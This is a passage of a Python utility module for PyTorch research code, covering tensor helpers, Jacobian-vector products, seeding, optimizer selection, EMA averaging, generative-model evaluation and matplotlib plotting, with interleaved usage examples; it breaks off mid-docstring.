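# Illustrative usage sketch (not part of the original utilities): flatten a nested
# structure of tensors and recover the original shapes with the returned `unravel`.
def _example_ravel_pytree():
    tree = [torch.zeros(2, 3), (torch.ones(4), torch.full((1, 2), 2.0))]
    flat, unravel = ravel_pytree(tree)
    assert flat.shape == (6 + 4 + 2,)
    rebuilt = unravel(flat)
    # `rebuilt` mirrors the nesting: [(2, 3) tensor, [(4,) tensor, (1, 2) tensor]].
    assert rebuilt[0].shape == (2, 3) and rebuilt[1][1].shape == (1, 2)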
def cat(args: Union[Tuple, List], dim=0, out=None):
"""Concatenation with broadcasting."""
size = [max(dims) for dims in zip_(*[list(t.size()) for t in args])]
return torch.cat([t.expand(size) for t in args], dim=dim, out=out)
def fill_tail_dims(y: torch.Tensor, y_like: torch.Tensor):
"""Fill in missing trailing dimensions for y according to y_like."""
return y[(...,) + (None,) * (y_like.dim() - y.dim())]
def channel_cat(t, y):
t = fill_tail_dims(t, y).expand_as(y[:, :1, ...])
return torch.cat((t, y), dim=1)
class Swish(nn.Module):
def __init__(self):
super(Swish, self).__init__()
def forward(self, x):
return _swish(x)
@torch.jit.script
def _swish(x):
return x * torch.sigmoid(x)
class Mish(nn.Module):
def forward(self, x):
return _mish(x)
@torch.jit.script
def _mish(x):
return x * torch.tanh(F.softplus(x))
def flat_to_shape(flat_tensor: torch.Tensor, shapes: Sequence):
"""Convert a flat tensor to a list of tensors with specified shapes.
`flat_tensor` must have exactly the number of elements as stated in `shapes`.
"""
numels = [shape.numel() for shape in shapes]
return [flat.reshape(shape) for flat, shape in zip_(flat_tensor.split(split_size=numels), shapes)]
def convert_none_to_zeros(sequence: Sequence[Union[torch.Tensor, type(None)]], like_sequence: Sequence[torch.Tensor]):
return [torch.zeros_like(q) if p is None else p for p, q in zip(sequence, like_sequence)]
def make_seq_requires_grad(sequence: Sequence[torch.Tensor]):
return [p if p.requires_grad else p.detach().requires_grad_(True) for p in sequence]
def is_strictly_increasing(ts):
return all(x < y for x, y in zip(ts[:-1], ts[1:]))
def make_any_check(func):
def any_check(*args, **kwargs):
inps = [arg for arg in args] + list(kwargs.values())
return any(func(inp) for inp in inps)
return any_check
isnan = make_any_check(lambda t: torch.isnan(t).any())
isinf = make_any_check(lambda t: torch.isinf(t).any())
def isnan_or_isinf(*args, **kwargs):
return isnan(*args, **kwargs) or isinf(*args, **kwargs)
def vjp(outputs, inputs, **kwargs):
if torch.is_tensor(inputs):
inputs = [inputs]
_dummy_inputs = [torch.as_strided(i, (), ()) for i in inputs] # Workaround for PyTorch bug #39784.
if torch.is_tensor(outputs):
outputs = [outputs]
outputs = make_seq_requires_grad(outputs)
_vjp = torch.autograd.grad(outputs, inputs, **kwargs)
return convert_none_to_zeros(_vjp, inputs)
def jvp(outputs, inputs, grad_inputs=None, **kwargs):
if torch.is_tensor(inputs):
inputs = [inputs]
_dummy_inputs = [torch.as_strided(i, (), ()) for i in inputs] # Workaround for PyTorch bug #39784.
if torch.is_tensor(outputs):
outputs = [outputs]
outputs = make_seq_requires_grad(outputs)
dummy_outputs = [torch.zeros_like(o, requires_grad=True) for o in outputs]
first_kwargs = copy.deepcopy(kwargs)
first_kwargs['create_graph'] = True
_vjp = torch.autograd.grad(
outputs, inputs, grad_outputs=dummy_outputs, **first_kwargs) # Must create graph to backprop a second time.
_jvp = torch.autograd.grad(_vjp, dummy_outputs, grad_outputs=grad_inputs, **kwargs)
return convert_none_to_zeros(_jvp, dummy_outputs)
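# Illustrative check (not part of the original utilities): for y = x ** 2 the JVP in
# direction v should equal 2 * x * v, exercising the double-backprop trick above.
def _example_jvp():
    x = torch.tensor([1.0, 2.0, 3.0], requires_grad=True)
    v = torch.tensor([1.0, 0.0, 1.0])
    y = x ** 2
    (jvp_val,) = jvp(outputs=y, inputs=x, grad_inputs=(v,))
    assert torch.allclose(jvp_val, 2 * x.detach() * v)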
def to_numpy(*possibly_tensors: Union[torch.Tensor, np.ndarray, float]):
arrays = possibly_tensors
arrays = [t.item() if isinstance(t, torch.Tensor) and t.numel() == 1 else t for t in arrays]
arrays = [t.detach().cpu().numpy() if isinstance(t, torch.Tensor) else t for t in arrays]
return arrays[0] if len(arrays) == 1 else arrays
def manual_seed(args_or_seed: Union[int, argparse.Namespace], hardcore=True, disable_tf=True):
if hasattr(args_or_seed, 'seed'):
args_or_seed = args_or_seed.seed
random.seed(args_or_seed)
np.random.seed(args_or_seed)
torch.manual_seed(args_or_seed)
torch.cuda.manual_seed_all(args_or_seed)
if hardcore:
# Avoid letting cudnn heuristics affect results.
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
os.environ['PYTHONHASHSEED'] = str(args_or_seed)
if not disable_tf:
try:
import tensorflow as tf
tf.random.set_seed(args_or_seed)
except ModuleNotFoundError:
logging.warning('Tensorflow not installed; ignoring set seed for tf.')
def get_dtype(dtype_str: str):
if dtype_str in ("single", "float32", "float"):
return torch.float
elif dtype_str in ("half", "float16"):
return torch.float16
elif dtype_str in ("double", "float64"):
return torch.float64
else:
raise ValueError(f"Unknown dtype: {dtype_str}")
def manual_dtype(args_or_dtype: Union[str, argparse.Namespace]):
dtype = args_or_dtype.dtype if hasattr(args_or_dtype, 'dtype') else args_or_dtype
if dtype in ('float64', 'double'):
torch.set_default_dtype(torch.float64)
elif dtype in ('float16', 'half'):
torch.set_default_dtype(torch.float16)
def trainable_parameters(*modules: nn.Module):
"""Return the parameters which require gradient."""
single_module = len(modules) == 1
outs = [
[param for param in module.parameters() if param.requires_grad] for module in modules
]
if single_module:
return outs[0]
return outs
def count_parameters(*modules: nn.Module, only_differentiable: Optional[bool] = False):
"""Count the number of parameters for each module."""
param_lists = [list(m.parameters()) for m in modules]
if only_differentiable:
param_lists = [[p for p in param_list if p.requires_grad] for param_list in param_lists]
numels = [sum(p.numel() for p in param_list) for param_list in param_lists]
return numels[0] if len(modules) == 1 else numels
def count_parameter_tensors(*modules: nn.Module, only_differentiable: Optional[bool] = False):
param_lists = [list(m.parameters()) for m in modules]
if only_differentiable:
param_lists = [[p for p in param_list if p.requires_grad] for param_list in param_lists]
lens = [len(param_list) for param_list in param_lists]
return lens[0] if len(modules) == 1 else lens
def count_tensor_list_size(tensor_list: Union[torch.Tensor, Sequence, Iterator], format="byte"):
"""Approximately count the size of a list of tensors in terms of bytes."""
if torch.is_tensor(tensor_list):
tensor_list = [tensor_list]
_bytes = 4 * sum([t.numel() for t in tensor_list])  # assumes 4 bytes per element (float32)
if format == "byte":
return _bytes
elif format == "kb":
return _bytes / 1024
elif format == "mb":
return _bytes / 1024 ** 2
elif format == "gb":
return _bytes / 1024 ** 3
else:
raise ValueError(f"Unknown format: {format}")
class View(nn.Module):
def __init__(self, shape):
super(View, self).__init__()
self.shape = tuple(shape)
def forward(self, x):
return x.view((-1,) + self.shape)
class FuncWrapper(nn.Module):
def __init__(self, func):
super(FuncWrapper, self).__init__()
self.func = func
def forward(self, *args, **kwargs):
return self.func(*args, **kwargs)
class NormalizedEmbedding(nn.Embedding):
def __init__(self, *args, **kwargs):
super(NormalizedEmbedding, self).__init__(*args, **kwargs)
nn.init.normal_(self.weight, std=self.embedding_dim ** -0.5)
def subsequent_mask(size, device=None):
"""Mask out subsequent positions.
Useful for transformer training.
"""
return torch.triu(torch.ones((1, size, size), device=device), diagonal=1) == 0
def masks_from_lengths(lengths: torch.Tensor):
"""Create True/False mask based on lengths.
Useful for masking out padding tokens.
"""
return torch.arange(max(lengths), device=lengths.device)[None, :] < lengths[:, None]
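# Illustrative usage sketch (not part of the original utilities): lengths [1, 3] give a
# (2, 3) mask with True over valid positions; `subsequent_mask(3)` gives the causal mask.
def _example_masks():
    mask = masks_from_lengths(torch.tensor([1, 3]))
    assert torch.equal(mask, torch.tensor([[True, False, False], [True, True, True]]))
    causal = subsequent_mask(3)
    assert causal.shape == (1, 3, 3) and bool(causal[0, 1, 0]) and not bool(causal[0, 0, 1])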
def evaluate_prettiness(sampler=None,
folder=None,
input_2='cifar10-train',
n=50000,
batch_size=1000,
clean_afterwards=False,
fid=False,
isc=False,
kid=False):
"""Evaluate a generative model in terms of IS, FID, or KID.
At least one of `sampler` or `folder` must be provided.
Args:
sampler (callable, optional): A callable that returns a batch of samples when called with `batch_size`.
folder (str, optional): Path to the folder that contains all the images.
input_2 (str, optional): Name of registered dataset or a path to a folder.
n (int, optional): Number of samples to take.
batch_size (int, optional): Number of samples in each batch.
clean_afterwards (bool, optional): Clean the local cache if True.
Returns:
A dictionary of metric values.
"""
import torch_fidelity
import matplotlib.pyplot as plt
if sampler is None and folder is None:
raise ValueError(f"model and folder cannot both be none")
if folder is None:
now = datetime.datetime.now().strftime("%d:%m:%Y-%H:%M:%S")
folder = os.path.join(os.path.expanduser("~"), 'evaluate_prettiness', f'{now}')
os.makedirs(folder, exist_ok=True)
idx = 0
for _ in tqdm.tqdm(range(n // batch_size), desc='spawn samples'):
batch = sampler(batch_size=batch_size).detach().cpu().numpy()
if batch.shape[1] == 3:
batch = batch.transpose((0, 2, 3, 1))
for img in batch:
img_path = os.path.join(folder, f'{idx:06d}.png')
plt.imsave(img_path, img)
idx += 1
stats = torch_fidelity.calculate_metrics(folder, input_2, isc=isc, fid=fid, kid=kid)
if clean_afterwards:
shutil.rmtree(folder)
return stats
def coos2adj(coos: Sequence[torch.Tensor], lengths: torch.Tensor, device=None):
"""Convert coordinate format tensor/list into an adjacency matrix.
Args:
coos: A sequence of index tensors each of size (T, 2).
lengths: A tensor for the size of each entry of size (batch_size,).
Returns:
A single tensor of size (batch_size, max(lengths), max(lengths)) with 1s
at position with arcs and 0s otherwise.
"""
for possibly_tensor in (coos[0], lengths):
if torch.is_tensor(possibly_tensor) and device is None:
device = possibly_tensor.device
break
N = max(lengths)
if isinstance(N, torch.Tensor):
N = N.item()
return torch.stack(
[
torch.sparse_coo_tensor(
size=(N, N),
indices=coo.t().to(device),
values=torch.ones(size=(len(coo),), dtype=torch.long, device=device),
).to_dense()
for coo in coos
],
dim=0
)
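# Illustrative usage sketch (not part of the original utilities): two graphs, one with
# an arc 0 -> 1 and one with arcs 0 -> 2 and 1 -> 0, packed into a (2, 3, 3) tensor.
def _example_coos2adj():
    coos = [torch.tensor([[0, 1]]), torch.tensor([[0, 2], [1, 0]])]
    lengths = torch.tensor([2, 3])
    adj = coos2adj(coos, lengths)
    assert adj.shape == (2, 3, 3)
    assert adj[0, 0, 1] == 1 and adj[1, 0, 2] == 1 and adj[1, 1, 0] == 1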
def select_activation(activation="softplus"):
# Avoid materializing the objects; just return the constructors.
return {
"softplus": nn.Softplus,
"swish": Swish,
"mish": Mish,
"tanh": nn.Tanh,
"elu": nn.ELU,
"relu": lambda: nn.ReLU(inplace=True),
"leaky_relu": nn.LeakyReLU,
"gelu": nn.GELU,
}[activation]
def select_optimizer(optimizer):
def trim_dict(dictionary, keys):
"""Only grab specific keys from dictionary.
Useful to allow arbitrary kwargs be accepted so that constructor doesn't break.
"""
return {k: dictionary[k] for k in keys if k in dictionary}
def optimizer_factory(params, **kwargs):
if optimizer == "adam":
keys = ('lr', 'betas', 'eps', 'weight_decay', 'amsgrad')
return optim.Adam(params=params, **trim_dict(kwargs, keys))
elif optimizer == "sgd":
keys = ('lr', 'momentum', 'dampening', 'weight_decay', 'nesterov')
return optim.SGD(params=params, **trim_dict(kwargs, keys))
elif optimizer == "adagrad":
keys = ('lr', 'lr_decay', 'weight_decay', 'initial_accumulator_value', 'eps')
return optim.Adagrad(params=params, **trim_dict(kwargs, keys))
elif optimizer == "adamax":
keys = ('lr', 'betas', 'eps', 'weight_decay')
return optim.Adamax(params=params, **trim_dict(kwargs, keys))
elif optimizer == "adadelta":
keys = ('lr', 'rho', 'eps', 'weight_decay')
return optim.Adadelta(params=params, **trim_dict(kwargs, keys))
else:
raise ValueError(f"Unknown optimizer: {optimizer}")
return optimizer_factory
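# Illustrative usage sketch (not part of the original utilities): build an Adam factory
# and apply it to a tiny model; kwargs that Adam does not accept are silently dropped.
def _example_select_optimizer():
    model = nn.Linear(4, 2)
    factory = select_optimizer("adam")
    return factory(model.parameters(), lr=1e-3, momentum=0.9)  # `momentum` is ignored for Adam.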
# Helper functions that mimic tensorflow variants.
# Properly tested against tensorflow==2.3.1
def scatter_nd(indices, updates, shape=None, out=None, accumulate=True, inplace=True):
if shape is None and out is None:
raise ValueError("`out` and `shape` cannot both be `None` for `scatter_nd`.")
if out is None:
out = torch.zeros(size=shape, device=updates.device, dtype=updates.dtype)
# `index_put` fails with non-contiguous tensors and produces uninterpretable error messages.
if not out.is_contiguous():
out = out.contiguous()
if inplace:
out.index_put_(
indices=[indices[:, i] for i in range(indices.size(1))],
values=updates, # noqa
accumulate=accumulate
) # noqa
else:
out = out.index_put(
indices=[indices[:, i] for i in range(indices.size(1))],
values=updates, # noqa
accumulate=accumulate
) # noqa
return out
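# Illustrative check (not part of the original utilities), mirroring the classic
# tf.scatter_nd example: scatter [9, 10, 11, 12] into a length-8 vector at rows 4, 3, 1, 7.
def _example_scatter_nd():
    indices = torch.tensor([[4], [3], [1], [7]])
    updates = torch.tensor([9.0, 10.0, 11.0, 12.0])
    out = scatter_nd(indices, updates, shape=(8,))
    assert torch.allclose(out, torch.tensor([0.0, 11.0, 0.0, 10.0, 9.0, 0.0, 0.0, 12.0]))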
def cosine_similarity(t1, t2):
return (t1 * t2).sum() / (t1.norm() * t2.norm())
def unravel_index(indices, shape):
"""Mimics np.unravel_index.
See Also
https://github.com/pytorch/pytorch/issues/35674
"""
unraveled_coords = []
for dim in reversed(shape):
unraveled_coords.append(indices % dim)
indices = indices // dim
return torch.stack(unraveled_coords[::-1], dim=-1)
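# Illustrative check (not part of the original utilities): flat indices 5 and 11 in a
# (3, 4) array map to (1, 1) and (2, 3), matching np.unravel_index.
def _example_unravel_index():
    coords = unravel_index(torch.tensor([5, 11]), shape=(3, 4))
    assert torch.equal(coords, torch.tensor([[1, 1], [2, 3]]))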
def topk(input, k, dim=-1, largest=True, sorted=True):
"""Returns multi-dim indices.
See Also
https://stackoverflow.com/questions/64241325/top-k-indices-of-a-multi-dimensional-tensor
"""
v, i = torch.topk(input.flatten(), k=k, dim=dim, largest=largest, sorted=sorted)
return v, unravel_index(i, input.size())
def retrieval_scores(tp: Union[torch.Tensor, np.ndarray],
fp: Union[torch.Tensor, np.ndarray],
fn: Union[torch.Tensor, np.ndarray]):
"""Compute precision, recall, F1."""
def _stable_div(x, y):
"""Returns 0 if x == 0, else x / y."""
if not isinstance(x, np.ndarray):
return 0. if x == 0. else (x / y)
return np.where(x == 0, 0., x / y)
tp, fp, fn = tuple(to_numpy(t) for t in (tp, fp, fn))
precision = _stable_div(tp, tp + fp)
recall = _stable_div(tp, tp + fn)
f1 = _stable_div(2 * precision * recall, precision + recall)
return precision, recall, f1
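# Illustrative worked example (not part of the original utilities): 8 true positives,
# 2 false positives, and 2 false negatives give precision = recall = F1 = 0.8.
def _example_retrieval_scores():
    precision, recall, f1 = retrieval_scores(
        tp=torch.tensor(8.0), fp=torch.tensor(2.0), fn=torch.tensor(2.0))
    assert abs(precision - 0.8) < 1e-9 and abs(recall - 0.8) < 1e-9 and abs(f1 - 0.8) < 1e-9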
# EMA model averaging.
# Only for backwards compatibility.
@torch.no_grad()
def ema_update(ema_model: nn.Module, model: nn.Module, gamma: Optional[float] = .999):
if isinstance(model, nn.DataParallel):
model = model.module # Base model.
ema_model_state = ema_model.training
ema_model.eval()
model_state = model.training
model.eval()
ema_state_dict = ema_model.state_dict()
for key, val in model.state_dict().items():
p1 = ema_state_dict[key]
if val.dtype in (torch.int32, torch.int64): # For `num_batches_tracked` in batch norm.
p1.data.copy_(val.detach())
else:
p1.data.copy_(gamma * p1 + (1 - gamma) * val.detach())
ema_model.train(ema_model_state)
model.train(model_state)
def inplace_ema(averaged_module, module, num_averaged, gamma=.99):
del num_averaged
averaged_module_state_dict = averaged_module.state_dict()
for key, val in module.state_dict().items():
p1 = averaged_module_state_dict[key]
if val.dtype in (torch.int32, torch.int64): # For `num_batches_tracked` in batch norm.
p1.data.copy_(val.detach())
else:
p1.data.copy_(gamma * p1.data + (1 - gamma) * val.data)
def inplace_polyak(averaged_module, module, num_averaged):
averaged_module_state_dict = averaged_module.state_dict()
for key, val in module.state_dict().items():
p1 = averaged_module_state_dict[key]
val = val.detach()
if val.dtype in (torch.int32, torch.int64): # For `num_batches_tracked` in batch norm.
p1.data.copy_(val)
else:
p1.data.copy_(p1 + (val - p1) / (num_averaged + 1))
class AveragedModel(nn.Module):
def __init__(self, module: nn.Module, avg_fn=inplace_ema, start_from=0):
super(AveragedModel, self).__init__()
self._module = module
self._averaged_module = copy.deepcopy(module)
self._avg_fn = avg_fn
self._start_from = start_from
self._num_averaged = 1
@torch.no_grad()
def step(self, global_step):
if global_step >= self._start_from:
self._avg_fn(
averaged_module=self._averaged_module,
module=self._module,
num_averaged=self._num_averaged
)
self._num_averaged += 1
else:
self._averaged_module = copy.deepcopy(self._module)
def forward(self, *args, **kwargs):
return self._averaged_module(*args, **kwargs)
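# Illustrative usage sketch (not part of the original utilities): wrap a model and update
# the EMA copy once per step; evaluation then goes through the averaged weights.
def _example_averaged_model():
    model = nn.Linear(4, 2)
    averaged = AveragedModel(model, avg_fn=inplace_ema, start_from=0)
    for global_step in range(3):
        # ... an optimizer step on `model` would normally go here ...
        averaged.step(global_step)
    return averaged(torch.randn(1, 4))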
def denormalize(x: torch.Tensor, mean: Sequence[float], std: Sequence[float]) -> torch.Tensor:
"""Unnormalize image for `torchvision.utils.save_image`."""
# (bsz, n_channels, nh, nw) -> (n_channels, nh, nw, bsz).
is_single_example = x.dim() == 3
if is_single_example:
x = x[None, ...]
ten = x.clone().permute(1, 2, 3, 0)
for t, m, s in zip(ten, mean, std):
t.mul_(s).add_(m)
# (n_channels, nh, nw, bsz) -> (bsz, n_channels, nh, nw).
out = torch.clamp(ten, 0, 1).permute(3, 0, 1, 2)
if is_single_example:
return out[0]
else:
return out
# Plotting.
def plot_wrapper(*args, suffixes: Optional[Sequence] = None, **kwargs):
"""Allows specifying paths with multiple suffixes."""
img_path = kwargs.pop("img_path", None)
if img_path is None:
return plot(*args, **kwargs) # Directly plot.
else:
if suffixes is None:
return plot(*args, img_path=img_path, **kwargs) # Plot with img_path directly.
else:
# Append suffix to img_path.
for suffix in suffixes:
this_img_path = img_path + suffix
plot(*args, img_path=this_img_path, **kwargs)
def plot(
img_path: Optional[str] = None,
plots: Sequence = (),
steps: Sequence = (),
vlines: Sequence = (),
hlines: Sequence = (),
scatters: Sequence = (),
hists: Sequence = (),
errorbars: Sequence = (),
bars: Sequence = (),
fill_betweens: Sequence = (),
annotates: Sequence = (),
stems: Sequence = (),
options: Optional[Dict] = None,
plots2: Sequence = (),
steps2: Sequence = (),
vlines2: Sequence = (),
hlines2: Sequence = (),
scatters2: Sequence = (),
hists2: Sequence = (),
errorbars2: Sequence = (),
bars2: Sequence = (),
fill_betweens2: Sequence = (),
annotates2=(),
stems2: Sequence = (),
options2: Optional[Dict] = None,
legend_options: Optional[Dict] = None,
disable_legend: Optional[bool] = False,
finalized: bool = True,
dpi: Optional[int] = None,
):
"""A multi-functional plotter to reduce boilerplate.
Good features of this plotter are:
1): Tweaked dpi.
2): Enabled tight_layout.
3): Plot closing.
4): Twin plots.
Args:
img_path (str): A path to the place where the image should be written.
plots (list of dict, optional): A list of curves that needs `plt.plot`.
steps (list of dict, optional): A list of curves that needs `plt.step`.
vlines (list of dict, optional): A list of vertical lines that needs `plt.vline`.
scatters (list of dict, optional): A list of scatter plots that needs `plt.scatter`.
hists (list of histograms, optional): A list of histograms that needs `plt.hist`.
errorbars (list of errorbars, optional): A list of errorbars that needs `plt.errorbar`.
bars (list of dict, optional): A list of bars that needs `plt.bar`.
fill_betweens: (list of dict, optional): A list of shaded regions; kwargs: 'x', 'y1', 'y2'.
options (dict, optional): A dictionary of optional arguments, such as title, xlabel, ylabel, etc.
plots2: Same format as above, but for twin plot.
steps2: Same format as above, but for twin plot.
vlines2: Same format as above, but for twin plot.
scatters2: Same format as above, but for twin plot.
hists2: Same format as above, but for twin plot.
errorbars2: Same format as above, but for twin plot.
bars2: Same format as above, but for twin plot.
fill_betweens2: Same format as above, but for twin plot.
options2: Same format as above, but for twin plot.
legend_options (dict, optional): A dictionary for kwargs passed to `ax.legend` or `plt.legend`.
disable_legend (bool, optional): Remove the legend.
finalized (bool, optional): Show or save the figure if True; otherwise the figure is still modifiable.
Returns:
Nothing.
"""
import matplotlib.pyplot as plt
try:
import seaborn as sns
sns.set_theme(style="darkgrid")
except ModuleNotFoundError:
logging.warning(f"Unable to find `seaborn`, reverting to solely matplotlib.")
if dpi is None:
if img_path is None:
dpi = 100
else:
dpi = 300
fig = plt.figure(dpi=dpi)
ax = fig.add_subplot(111)
if any(len(i) > 0 for i in (plots2, scatters2, hists2, errorbars2, bars2)):
ax2 = ax.twinx()
else:
ax2 = None
_plot(
ax=ax,
plots=plots,
steps=steps,
vlines=vlines,
hlines=hlines,
errorbars=errorbars,
scatters=scatters,
hists=hists,
bars=bars,
fill_betweens=fill_betweens,
options=options,
annotates=annotates,
stems=stems,
)
# Twin-x plot: Share xaxis.
if ax2 is not None:
_plot(
ax=ax2,
plots=plots2,
steps=steps2,
vlines=vlines2,
hlines=hlines2,
scatters=scatters2,
hists=hists2,
errorbars=errorbars2,
bars=bars2,
fill_betweens=fill_betweens2,
options=options2,
annotates=annotates2,
stems=stems2,
)
if legend_options is None:
legend_options = dict(fontsize=13, framealpha=0.6)
legend = ax.legend(**legend_options)
if ax2 is not None:
# Remove first legend then draw again to prevent second plot covering it.
# https://stackoverflow.com/questions/29010078/matplotlib-data-being-plotted-over-legend-when-using-twinx
legend.remove()
ax2.legend(**legend_options)
ax2.add_artist(legend)
if ax2 is None and disable_legend:
legend.remove()
plt.tight_layout()
if finalized:
if img_path is None:
plt.show()
else:
os.makedirs(os.path.dirname(img_path), exist_ok=True)
plt.savefig(img_path)
plt.close()
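# Illustrative usage sketch (not part of the original module): each entry in `plots`,
# `scatters`, etc. is a dict whose 'x'/'y' keys carry the data and whose remaining keys are
# forwarded to the underlying matplotlib call; `options` carries axes-level settings.
# The path and loss curves below are made up for the example.
def _example_plot(img_path: str = "./plots/loss.png"):
    xs = list(range(100))
    train_loss = [1.0 / (i + 1) for i in xs]
    val_loss = [1.2 / (i + 1) for i in xs]
    plot(
        img_path=img_path,
        plots=[
            dict(x=xs, y=train_loss, label="train"),
            dict(x=xs, y=val_loss, label="val", linestyle="--"),
        ],
        options=dict(xlabel="step", ylabel="loss", yscale="log"),
    )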
def _feed_args(options, key, func):
if key in options:
params = options[key]
if type(params) == dict:
func(**params)
elif type(params) in (list, tuple):
func(*params)
else:
func(params)
def _plot(ax, plots, steps, vlines, hlines, errorbars, scatters, hists, bars, fill_betweens, options, annotates, stems):
if options is None:
options = dict()
possible_options = {
'xscale', 'yscale',
'xlabel', 'ylabel',
'xlabel_color', 'ylabel_color',
'title',
'xlim', 'ylim',
'xticks', 'yticks',
'xticklabels', 'yticklabels',
'tick_params'
}
for key in options:
if key not in possible_options:
logging.warning(f"Unknown option fed to `_plot`: {key}")
# Fix default font sizes for xylabels.
if 'xlabel' in options and not isinstance(options['xlabel'], dict):
options['xlabel'] = dict(xlabel=options['xlabel'], fontdict=dict(size=18))
if 'ylabel' in options and not isinstance(options['ylabel'], dict):
options['ylabel'] = dict(ylabel=options['ylabel'], fontdict=dict(size=18))
_feed_args(options, 'xscale', ax.set_xscale)
_feed_args(options, 'yscale', ax.set_yscale)
_feed_args(options, 'xlabel', ax.set_xlabel)
_feed_args(options, 'ylabel', ax.set_ylabel)
_feed_args(options, 'xlabel_color', ax.xaxis.label.set_color)
_feed_args(options, 'ylabel_color', ax.yaxis.label.set_color)
_feed_args(options, 'title', ax.set_title)
_feed_args(options, 'xlim', ax.set_xlim)
_feed_args(options, 'ylim', ax.set_ylim)
_feed_args(options, 'xticks', ax.set_xticks)
_feed_args(options, 'yticks', ax.set_yticks)
_feed_args(options, 'xticklabels', ax.set_xticklabels)
_feed_args(options, 'yticklabels', ax.set_yticklabels)
_feed_args(options, 'tick_params', ax.tick_params)
for entry in plots:
kwargs = {key: entry[key] for key in entry if key != 'x' and key != 'y'}
kwargs.pop('aux', None)
ax.plot(entry['x'], entry['y'], **kwargs)
for entry in steps:
kwargs = {key: entry[key] for key in entry if key != 'x' and key != 'y'}
kwargs.pop('aux', None)
ax.step(entry['x'], entry['y'], **kwargs)
for entry in vlines:
kwargs = {key: entry[key] for key in entry if key not in ('x', 'ymin', 'ymax')}
kwargs.pop('aux', None)
ax.vlines(entry['x'], entry['ymin'], entry['ymax'], **kwargs)
for entry in hlines:
kwargs = {key: entry[key] for key in entry if key not in ('y', 'xmin', 'xmax')}
kwargs.pop('aux', None)
ax.hlines(entry['y'], entry['xmin'], entry['xmax'], **kwargs)
for entry in errorbars:
kwargs = {key: entry[key] for key in entry if key != 'x' and key != 'y'}
kwargs.pop('aux', None)
if "capsize" not in kwargs:
kwargs["capsize"] = 5
ax.errorbar(entry['x'], entry['y'], **kwargs)
for entry in scatters:
kwargs = {key: entry[key] for key in entry if key != 'x' and key != 'y'}
kwargs.pop('aux', None)
ax.scatter(entry['x'], entry['y'], **kwargs)
for entry in hists:
kwargs = {key: entry[key] for key in entry if key != 'x'}
kwargs.pop('aux', None)
ax.hist(entry['x'], **kwargs)
for entry in fill_betweens:
kwargs = {key: entry[key] for key in entry if key not in ('x', 'y1', 'y2')}
kwargs.pop('aux', None)
if 'alpha' not in kwargs:
kwargs['alpha'] = 0.4
ax.fill_between(entry['x'], entry['y1'], entry['y2'], **kwargs)
width = options.get("width", 0.2)
for i, entry in enumerate(bars):
kwargs = {key: entry[key] for key in entry if key != 'x' and key != 'height'}
kwargs.pop('aux', None)
# Each bar has width, the starting position is - (l-1) / 2 * width.
x, height = [np.array(entry[key]) for key in ('x', 'height')]
ax.bar(x - width * (len(bars) - 1) / 2 + width * i, height, width=width, **kwargs)
for entry in annotates:
kwargs = copy.deepcopy(entry)
text, xy = kwargs.pop("text"), kwargs.pop("xy")
ax.annotate(text, xy, **kwargs)
for entry in stems:
kwargs = {key: entry[key] for key in entry if key not in ("locs", "heads")}
ax.stem(entry["locs"], entry["heads"], **kwargs)
return ax
def get_sns_colors(color=None, palette=None):
import seaborn as sns
palette = sns.color_palette(palette=palette)
if color is None:
return palette
else:
if color == 'blue':
return palette[0]
elif color == "orange":
return palette[1]
elif color == "green":
return palette[2]
elif color == "red":
return palette[3]
elif color == "purple":
return palette[4]
elif color == "brown":
return palette[5]
elif color == "pink":
return palette[6]
elif color == "grey":
return palette[7]
elif color == "yellow":
return palette[8]
elif color == "cyan":
return palette[9]
else:
raise ValueError(f"Unknown color: {color}")
def plot_side_by_side(figs1,
figs2,
nrows=8,
ncols=1,
img_path=None,
dpi=300,
title=None,
left_title=None,
right_title=None,
frameon=True,
max_batch_size=64):
"""Plot a dictionary of figures.
Parameters
----------
ncols : number of columns of subplots wanted in the display
nrows : number of rows of subplots wanted in the figure
"""
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
os.makedirs(os.path.dirname(img_path), exist_ok=True)
figs1, figs2 = figs1.squeeze(), figs2.squeeze()
if isinstance(figs1, torch.Tensor):
figs1 = to_numpy(figs1)
if isinstance(figs2, torch.Tensor):
figs2 = to_numpy(figs2)
assert figs1.shape == figs2.shape
figs1, figs2 = figs1[:max_batch_size, ...], figs2[:max_batch_size, ...]
if nrows * ncols < len(figs1):
ncols = (len(figs1) + nrows - 1) // nrows
assert nrows * ncols >= len(figs1)
fig = plt.figure(dpi=dpi, frameon=frameon)
outer = gridspec.GridSpec(1, 2, wspace=0.05, hspace=0.05)
if left_title is not None:
ax = plt.Subplot(fig, outer[0])
ax.set_title(left_title)
ax.axis('off')
fig.add_subplot(ax)
left_block = gridspec.GridSpecFromSubplotSpec(nrows, ncols, subplot_spec=outer[0], wspace=0.0, hspace=0.0)
for ind, item in enumerate(figs1):
ax = plt.Subplot(fig, left_block[ind])
ax.set_axis_off()
ax.set_aspect('auto')
if isinstance(figs1, dict):
# `item` is the key.
img = figs1[item]
cmap = plt.gray() if len(img.shape) == 2 else None
ax.imshow(img, cmap=cmap)
ax.set_title(item)
else:
# `item` is the image.
cmap = plt.gray() if len(item.shape) == 2 else None
item = item.transpose(1, 2, 0) if item.shape[0] in (1, 3) else item
ax.imshow(item, cmap=cmap)
fig.add_subplot(ax)
if right_title is not None:
ax = plt.Subplot(fig, outer[1])
ax.set_title(right_title)
ax.axis('off')
fig.add_subplot(ax)
right_block = gridspec.GridSpecFromSubplotSpec(nrows, ncols, subplot_spec=outer[1], wspace=0.0, hspace=0.0)
for ind, item in enumerate(figs2):
ax = plt.Subplot(fig, right_block[ind])
ax.set_axis_off()
ax.set_aspect('auto')
if isinstance(figs2, dict):
# `item` is the key.
img = figs2[item]
cmap = plt.gray() if len(img.shape) == 2 else None
ax.imshow(img, cmap=cmap)
ax.set_title(item)
else:
# `item` is the image.
cmap = plt.gray() if len(item.shape) == 2 else None
item = item.transpose(1, 2, 0) if item.shape[0] in (1, 3) else item
ax.imshow(item, cmap=cmap)
fig.add_subplot(ax)
fig.suptitle(title)
plt.savefig(img_path, bbox_inches='tight')
plt.clf()
plt.close()
# Shameless copy from https://matplotlib.org/3.5.0/gallery/images_contours_and_fields/image_annotated_heatmap.html
# TODO: These utils are inconvenient; need to modify in the future.
# Also, kwargs should not have dict as default value. Terrible style!
def heatmap(data, row_labels, col_labels, ax=None,
cbar_kw={}, cbarlabel="", **kwargs):
"""
Create a heatmap from a numpy array and two lists of labels.
Parameters
----------
data
A 2D numpy array of shape (M, N).
row_labels
A list or array of length M with the labels for the rows.
col_labels
